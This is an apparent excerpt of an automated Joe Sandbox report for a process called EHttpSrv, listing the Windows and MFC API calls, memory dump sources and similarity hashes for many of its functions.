• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2648MessageSend$#1894#2366#2870#3793ParentRect
• String ID: n
• API String ID: 3451452917-2013832146
• Opcode ID: 8e907037b50fc14d0f54713da9c73fca789de84a615d102d6b827bd69ab568b9
• Instruction ID: b227bfd30f0165713bd93f83064325098b5a49957d0074c773c577a7dac5abfd
• Opcode Fuzzy Hash: 8e907037b50fc14d0f54713da9c73fca789de84a615d102d6b827bd69ab568b9
• Instruction Fuzzy Hash: 321166B22047056BC314DBA9CC95E6F77EDBB8CA14F00CA1CF699C7690DA74D9448BA1
APIs
  • Part of subcall function 204725C0: #310.MFC80U(?), ref: 2047263D
  • Part of subcall function 204725C0: #4026.MFC80U(00000134), ref: 20472676
  • Part of subcall function 204725C0: #1925.MFC80U ref: 2047267E
  • Part of subcall function 204725C0: GetDC.USER32(00000000), ref: 2047269D
  • Part of subcall function 204725C0: ReleaseDC.USER32(00000000,00000000), ref: 204726BC
  • Part of subcall function 204725C0: #1271.MFC80U(00000000,00000000,?,?), ref: 204726C7
  • Part of subcall function 204725C0: #1925.MFC80U(00000000,00000000,?,?), ref: 204726D2
  • Part of subcall function 204725C0: GetDC.USER32(00000000), ref: 204726F1
  • Part of subcall function 204725C0: #1271.MFC80U(00000000,00000000,00000000,?,?), ref: 20472721
  • Part of subcall function 20468200: EnterCriticalSection.KERNEL32(-00003A84,FEEA6C22,?,-00003AB4,?,00000000), ref: 20468254
  • Part of subcall function 20468200: LeaveCriticalSection.KERNEL32(-00003A84,?,00000000), ref: 20468305
• #310.MFC80U(?), ref: 20468CD1
• #310.MFC80U ref: 20468CE4
• #4026.MFC80U(00000271), ref: 20468CFB
• #4026.MFC80U(00000270), ref: 20468D0A
• MessageBoxW.USER32(?,FEEA6C22,?,00000040), ref: 20468D1D
• #578.MFC80U ref: 20468D2E
• #578.MFC80U ref: 20468D40
• EnterCriticalSection.KERNEL32(FEEA6C6A,?,?,00000000,?), ref: 20468E59
• LeaveCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 20468ED5
• EnterCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 20468EF5
• #1176.MFC80U(?), ref: 20468FE9
• LeaveCriticalSection.KERNEL32(?,?), ref: 20469322
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: CriticalSection$#310#4026EnterLeave$#1271#1925#578$#1176MessageRelease
• String ID:
• API String ID: 1322123760-0
• Opcode ID: 7078abcdab72a5927a4393b918f6e8bfa50432065ef7b6eb6b3f10c921c9fd8d
• Instruction ID: 88d285f7ef9232bd13c2742594fa65263f5fded8ba666aec868e8f2817e94b27
• Opcode Fuzzy Hash: 7078abcdab72a5927a4393b918f6e8bfa50432065ef7b6eb6b3f10c921c9fd8d
• Instruction Fuzzy Hash: 71226D706087419FC328CF54C884B9EB7E5BFC8718F148A1DE589973A1EB39E945CB92
APIs
• #310.MFC80U(FEEA6C22), ref: 20456B76
• wcsncmp.MSVCR80 ref: 20456BE7
• wcsncmp.MSVCR80 ref: 20456C30
• GetSystemMetrics.USER32(00000031), ref: 20456C6A
• #1079.MFC80U(?,000000FF,?), ref: 20456CAD
• DestroyCursor.USER32(?), ref: 20456CC8
• #1176.MFC80U ref: 20456CD0
• #776.MFC80U(?), ref: 20456CE6
• #3873.MFC80U(00000003,00000000,?,00000000,00000000,?,00000000), ref: 20456D08
• #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,?,00000000), ref: 20456D2B
• #5742.MFC80U(00000000,?,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,?), ref: 20456D54
• #578.MFC80U ref: 20456D68
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: wcsncmp$#1079#1176#310#3873#5742#578#5862#776CursorDestroyMetricsSystem
• String ID:
• API String ID: 2983318147-0
APIs
Similarity
• API ID: #310#4026malloc$#314#5149#5398#6751#776memcpy
• String ID:
• API String ID: 1514184627-0
APIs
• #310.MFC80U(FEEA6C22,?,00000000,?,76945540), ref: 204603E6
• #578.MFC80U ref: 20460435
• wcsncmp.MSVCR80 ref: 2046047D
• GetSystemMetrics.USER32(00000031), ref: 204604B3
• #1079.MFC80U(?,000000FF,?,?,?,?,76945540), ref: 204604F5
• DestroyCursor.USER32(?), ref: 20460510
• #1176.MFC80U(?,00000000,?,76945540), ref: 20460518
• #776.MFC80U(?,?,00000000,?,76945540), ref: 2046052E
• #3873.MFC80U(00000003,00000000,?,00000000,00000000,?,00000000,?,00000000,?,76945540), ref: 2046054C
• #5862.MFC80U(00000000,00000001,00000003,00000000,?,00000000,00000000,00000000,00000003,00000000,?,00000000,00000000,?,00000000), ref: 20460573
• #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000,00000000,00000000), ref: 2046058F
• #5742.MFC80U(00000000,?,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000), ref: 204605BD
Similarity
• API ID: #5862$#1079#1176#310#3873#5742#578#776CursorDestroyMetricsSystemwcsncmp
• String ID:
• API String ID: 3302704164-0
APIs
• SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20422860
  • Part of subcall function 204229E0: #1172.MFC80U(00000002,?,20422877,00000000), ref: 204229EF
  • Part of subcall function 204229E0: #2297.MFC80U(20422877,00000000), ref: 20422A01
• memset.MSVCR80 ref: 20422880
• SendMessageW.USER32(?,0000120B,00000000,00000001), ref: 204228A9
• #2297.MFC80U ref: 204228CA
• #1172.MFC80U(00000002,?), ref: 204228F0
• #1172.MFC80U(00000004,?), ref: 204228FF
• #2250.MFC80U(?), ref: 20422919
• SendMessageW.USER32(?,00001200,00000000,00000000), ref: 2042293A
• memset.MSVCR80 ref: 2042294D
• #2250.MFC80U(?), ref: 20422982
• SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 204229A9
• #1172.MFC80U(00000004,?), ref: 204229C5
Similarity
• API ID: #1172MessageSend$#2250#2297memset
• String ID:
• API String ID: 3378238609-0
APIs
  • Part of subcall function 20462D50: #280.MFC80U(?,?,00000001,00000000,00000000), ref: 20462E3B
  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 2046407B
  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464094
  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640B3
  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640D8
  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640FD
  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464122
• LeaveCriticalSection.KERNEL32(FEEA6C6A,FEEA6C22,?), ref: 20463AB0
• #310.MFC80U(?,?,?), ref: 20463AE1
• #310.MFC80U ref: 20463AF4
• #4026.MFC80U(0000010A), ref: 20463B0B
• #4026.MFC80U(000000B2), ref: 20463B1A
• MessageBoxW.USER32(?,?,?,00000010), ref: 20463B30
• #578.MFC80U ref: 20463B41
• #578.MFC80U ref: 20463B53
• #764.MFC80U(?,?,?,?,?), ref: 20463B81
• #764.MFC80U(?,?,?,?,?), ref: 20463B9E
• #764.MFC80U(?), ref: 20463BE9
• #764.MFC80U(?), ref: 20463C06
Similarity
• API ID: #764$#310#4026#578$#280CriticalLeaveMessageSection
• String ID:
• API String ID: 2973313494-0
APIs
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20437E75
• #2362.MFC80U(00000000), ref: 20437E7C
• SendMessageW.USER32(?,00000030,?,00000001), ref: 20437ED1
• GetDC.USER32(?), ref: 20437EDB
• #2361.MFC80U(00000000,?,00000000,00000000), ref: 20437EE2
• #6735.MFC80U(2048BFA8,00000000,?,00000000,00000000), ref: 20437EF2
• GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 20437F0E
• #578.MFC80U ref: 20437F20
• ReleaseDC.USER32(?,?), ref: 20437F2E
• #1589.MFC80U(56000000,?,?,00000001), ref: 20437F6F
• #4109.MFC80U(00000000,00001037,00000000,56000000,?,?,00000001), ref: 20437F7D
• SendMessageW.USER32(?,00000030,?,00000001), ref: 20437F9D
Similarity
• API ID: MessageSend$#1589#2361#2362#4109#578#6735ExtentPoint32ReleaseText
• String ID:
• API String ID: 1012144733-0
APIs
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 2042591B
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20425935
• #310.MFC80U ref: 20425963
• #2311.MFC80U(?,2048587C,?), ref: 2042597F
• #6063.MFC80U(20485878), ref: 2042599F
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 204259B4
• #6063.MFC80U(?), ref: 204259DB
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 204259F0
• #6063.MFC80U(?), ref: 20425A1D
• #578.MFC80U ref: 20425A35
• #6063.MFC80U(20485878), ref: 20425A5D
• #6063.MFC80U(20485878,20485878), ref: 20425A6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: f6d7724b27683941b8b5eada9326c8c590702085192de9e58ad1dd4513675fa0
                                                                                                                • Instruction ID: 582b9dc04473b64b519ac912cf7b71737fc35bebc9d7e7eb96b471d9d28eae63
                                                                                                                • Opcode Fuzzy Hash: f6d7724b27683941b8b5eada9326c8c590702085192de9e58ad1dd4513675fa0
                                                                                                                • Instruction Fuzzy Hash: E74124312483869BD734DF54CC91FDA77A8FB84714F108A2DF9899BAE0DB79A904CB41
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20436504
                                                                                                                • SendMessageW.USER32(?,0000110A,00000005,00000000), ref: 20436517
                                                                                                                • GetClientRect.USER32(?,?), ref: 2043652C
                                                                                                                • #2870.MFC80U(00000000,?,00000001,?,00000000), ref: 20436540
                                                                                                                • SendMessageW.USER32(?,0000120B), ref: 2043656A
                                                                                                                  • Part of subcall function 20436160: #2872.MFC80U(00000000,00000002,FEEA6C22,?,00000000,00000000,?), ref: 204361BF
                                                                                                                  • Part of subcall function 20436160: GetSysColor.USER32(00000005), ref: 2043627F
                                                                                                                  • Part of subcall function 20436160: GetSysColor.USER32(0000000E), ref: 2043629B
                                                                                                                  • Part of subcall function 20436160: #2255.MFC80U(?,00000000,?,00000000,00000000,?), ref: 204362A9
                                                                                                                  • Part of subcall function 20436160: GetCurrentObject.GDI32(?,00000006), ref: 204362F1
                                                                                                                  • Part of subcall function 20436160: #2362.MFC80U(00000000,?,00000000,00000000,?), ref: 204362F8
                                                                                                                • SendMessageW.USER32(?,0000110A,00000006,00000000), ref: 204365A9
                                                                                                                • GetFocus.USER32 ref: 204365BF
                                                                                                                • #2366.MFC80U(00000000,?,00000000), ref: 204365C6
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 204365DC
                                                                                                                • #2870.MFC80U(00000000,?,00000001,?,00000000), ref: 204365EC
                                                                                                                • SendMessageW.USER32(?,00001207,-000000FE,?), ref: 2043660A
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 20436621
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2870ColorFocusRect$#2255#2362#2366#2872ClientCurrentDrawObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 1541409541-0
                                                                                                                • Opcode ID: b40490253f37213525eb9d32132aba65a2ad5db0a5ce1d1269bff6341410bc55
                                                                                                                • Instruction ID: c517e2def2d85d5d604394ba5021e36b664c3c92d93ee0bf02585ee706479133
                                                                                                                • Opcode Fuzzy Hash: b40490253f37213525eb9d32132aba65a2ad5db0a5ce1d1269bff6341410bc55
                                                                                                                • Instruction Fuzzy Hash: A2413EB1604306AFD704DFA4CC85F6BBBA9FB88B05F10891DF68597681DBB5E804CB91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#310#578#6063$#2311#4026#4574
                                                                                                                • String ID:
                                                                                                                • API String ID: 3542734806-0
                                                                                                                • Opcode ID: 78384c6e0946633d7676bbfd93b0f125e38c0116b58ab90867058bc92283b960
                                                                                                                • Instruction ID: 42403b73f26213ef6e87cd317a585e460af4d5e690aa4c1b2616b82490cc4c81
                                                                                                                • Opcode Fuzzy Hash: 78384c6e0946633d7676bbfd93b0f125e38c0116b58ab90867058bc92283b960
                                                                                                                • Instruction Fuzzy Hash: 714113311487419FC724DF10CC94BAB7BE8FB88319F008A2DF959976E0DB39A908CB51
                                                                                                                APIs
                                                                                                                • #1894.MFC80U ref: 20433F6E
                                                                                                                • SetCapture.USER32(?), ref: 20433F84
                                                                                                                • #2366.MFC80U(00000000), ref: 20433F8B
                                                                                                                • GetFocus.USER32 ref: 20433F90
                                                                                                                • #2366.MFC80U(00000000), ref: 20433F97
                                                                                                                • #5829.MFC80U(00000000), ref: 20433FAE
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20433FED
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20433FFA
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20434007
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 2043402E
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 2043403B
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20434048
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect$#2366$#1894#5829CaptureFocus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1167244330-0
                                                                                                                • Opcode ID: 068da07438faabc6f6d6ae5bffaeecf7222d5a751c470430f498ef03d4065304
                                                                                                                • Instruction ID: 7faf8ccecfcd7332bc059641ffefd81bea4cb990eec4ec3de1a958530146c04d
                                                                                                                • Opcode Fuzzy Hash: 068da07438faabc6f6d6ae5bffaeecf7222d5a751c470430f498ef03d4065304
                                                                                                                • Instruction Fuzzy Hash: 9B316071204700ABD214DBB5CC85FA7B3E9FBC8704F948A0CF69A97290EA75F905CB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID: 1.0$<$ENCODING$UTF-8$VERSION$XML
                                                                                                                • API String ID: 2081463915-2306877985
                                                                                                                • Opcode ID: c7f5506fce8cae5a84be547d077c7318a93c7e49eb3425ea1b743a19214ccfad
                                                                                                                • Instruction ID: 1d0823a0a285932af6489363e0feb85522811e26584ceb1749aba48eb4484664
                                                                                                                • Opcode Fuzzy Hash: c7f5506fce8cae5a84be547d077c7318a93c7e49eb3425ea1b743a19214ccfad
                                                                                                                • Instruction Fuzzy Hash: FDD17E71A083428BD718DFA4C88079A77E6BF84258F40C93DFC95A7761E738DD458B82
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043A1C0: free.MSVCR80 ref: 2043A200
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 2043A504
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 2043A535
                                                                                                                • malloc.MSVCR80 ref: 2043A566
                                                                                                                  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?), ref: 2043A5FB
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 2043A639
                                                                                                                • free.MSVCR80 ref: 2043A652
                                                                                                                • malloc.MSVCR80 ref: 2043A678
                                                                                                                • memcpy.MSVCR80(?,?,?,?,?,?,?,?,?), ref: 2043A69B
                                                                                                                • free.MSVCR80 ref: 2043A6BE
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 2043A6F4
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000), ref: 2043A720
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$free$malloc$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 236868670-0
                                                                                                                • Opcode ID: 36469199be2fc4294bb0f29db453580350ffecaf771399cc54a00d94b3cd08aa
                                                                                                                • Instruction ID: 5a313df643740f4e31eff7ce4a5d45c12dc0293d2de4af8accc6272d7ce1a5ed
                                                                                                                • Opcode Fuzzy Hash: 36469199be2fc4294bb0f29db453580350ffecaf771399cc54a00d94b3cd08aa
                                                                                                                • Instruction Fuzzy Hash: 50914A71644306AFD300DFA5C884B6BB7E8BF88704F14891EF59987341E778E969CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free$_wcsicmp$realloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2732086526-0
                                                                                                                • Opcode ID: c31a5d5e8833dbd2c4ad275c96db9c2fd158b6a8639ebb0e1260efbe0684881c
                                                                                                                • Instruction ID: 510f4b816378c81cdf23e68cf9a9b2965e75cf173a2ffd1b7ce18075a4390d9e
                                                                                                                • Opcode Fuzzy Hash: c31a5d5e8833dbd2c4ad275c96db9c2fd158b6a8639ebb0e1260efbe0684881c
                                                                                                                • Instruction Fuzzy Hash: F28180B55083859BD304DF95C980B2BBBE9BF84714F048A3DFD9593390E7B9E9048B92

APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #4026$#314#6751
• String ID:
• API String ID: 624441723-0
• Opcode ID: 7639eca9ec8cf7fa67a00069b6f69e1fb63530fbf32c397b7fdbab8c2ed0f492
• Instruction ID: a9490e028f835bd30253005466e77ed39ab977ce8c7d87d1f14cffa540b6269b
• Opcode Fuzzy Hash: 7639eca9ec8cf7fa67a00069b6f69e1fb63530fbf32c397b7fdbab8c2ed0f492
• Instruction Fuzzy Hash: F161E571A48B42AFD318CF68C884B9AF7E1FB84314F10C62DE55647790DB39E909DB52

APIs
• #310.MFC80U(FEEA6C22,?,00000000,?,76945540), ref: 204616D6
• #578.MFC80U ref: 20461721
• wcsncmp.MSVCR80 ref: 20461769
• GetSystemMetrics.USER32(00000031), ref: 2046179F
• #1079.MFC80U(?,000000FF,?,?,?,?,76945540), ref: 204617E2
• DestroyCursor.USER32(?), ref: 204617FB
• #1176.MFC80U(?,00000000,?,76945540), ref: 20461803
• #776.MFC80U(?,?,00000000,?,76945540), ref: 20461819
• #3873.MFC80U(00000003,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,76945540), ref: 20461837
• #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 2046185E
• #5742.MFC80U(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,00000000), ref: 20461888
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #1079#1176#310#3873#5742#578#5862#776CursorDestroyMetricsSystemwcsncmp
• String ID:
• API String ID: 3476607945-0
• Opcode ID: c3c9437011b63458bf720ad2ca5c69a012f88d62e895b64de5979d9264fff577
• Instruction ID: c609bfa9d73d1ddc3338c9e3a7b4b4835114118346bc65253926fe962d1c947b
• Opcode Fuzzy Hash: c3c9437011b63458bf720ad2ca5c69a012f88d62e895b64de5979d9264fff577
